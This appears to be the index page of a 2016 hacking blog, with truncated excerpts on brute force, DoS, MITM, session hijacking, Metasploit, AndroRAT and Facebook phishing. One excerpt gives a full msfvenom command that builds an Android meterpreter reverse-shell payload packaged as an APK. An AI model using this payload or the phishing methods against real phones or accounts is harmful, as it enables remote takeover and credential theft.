Thursday, 20 October 2016

Choose your Programming Language for Hacking


Which programming language is good for hacking - 

This is the most common question rising in the mind of every hacker when he steps into the cyber world.



Hackers fav Sport Picking Locks


Picking Locks is the hackers most awesome trick 


Have you heard Mr.Robot saying this ? yes then you are a true fan and a cool hacker. As a hacker it's

Saturday, 15 October 2016

Kali Linux Wi-Fi issue solved


Kali Linux Wi-Fi problem is now like a universal issue lol.



But it’s not the kali which is the problem here nor the adapter you are using.

It’s the IEEE standards that’s causing you this. What can I say “IEEE standards are not standard enough”.

Friday, 14 October 2016

Bruteforce Attacks (all you need to know)

Brute Force Attacks



A Brute Force Attack is a type of Cyber Attack, where you have a

What the hell is an Exploit ???

What does exploit mean?




An exploit is the use of software, data, or commands to “exploit” a

Smurf Attacks aka DOS attacks (all you need to know)

What is a Smurf Attack? –

Definition

SECURITY DEFINITION

A Smurf attack is a form of a distributed denial of service (DDoS) attack that renders computer networks inoperable.




Install Metasploit on Windows



I have made a set of tutorials on METASPLOIT from the beginning

Click here to watch them -

Metasploit Tutorial - 1 (Bsics and Itroduction) 

Session Hijacking (all you need to know)

Introduction for beginners-

Web applications communicate using HTTP protocol. HTTP is stateless, which means there is no support at the protocol level to identify the state of a particular request.


In other words, web servers don’t have any mechanism to know whether

Replay attack explained


A replay attack is an attack where an authentication session is replayed by an attacker to fool a computer into granting access.


It may be any form or retransmission of a network data transmission

Proxy Server (with basic setup)

What are proxy servers?

Proxy servers:-
It allow for you to configure your browser to route your browser

All about Man In The Middle Attack (MITMA)


What is Man-in-the-middle attack

A popular method is Man-in-the-middle attack. It is also known as a bucket brigade attack,

Metasploit Cheat Sheet (all commands)


Here are some of the core commands we can use on the meterpreter.
? - help menu
background - moves the current session to the background

Kali Linux Tools with Links



Here is the list of all tools in Kali Linux

Information Gathering

Thursday, 13 October 2016

Andro RAT (RAT for android)

Androrat (RAT For Android)



Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve information from it.

Hacking android with Metasploit in Kali Linux


Let’s Hack android with metasploit in Kali Linux – It’s very easy
Open your terminals and type in-

Msfvenom –p android/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 R > filename.apk


Tuesday, 4 October 2016

What is a PWNIE phone??





Have you seen Mr.Robot mentioning it in the series 2 ? Yes he was talking about this phone here.

He said something like this “a dream device for a pen tester”. Hell he was right.

Saturday, 1 October 2016

Cyber War


Real Time Cyber War –


Here are some awesome sites which give you the live detail of Cyber

Hacking facebook with phishing on lan


Hack facebook with kali 



Other posts you might be interested in -

How to use ‘theharvester’

How to use ‘theharvester’ –

‘Theharvester’ is a tool in Kali Linux used for information gathering.


                 As pen testers we all know that it is very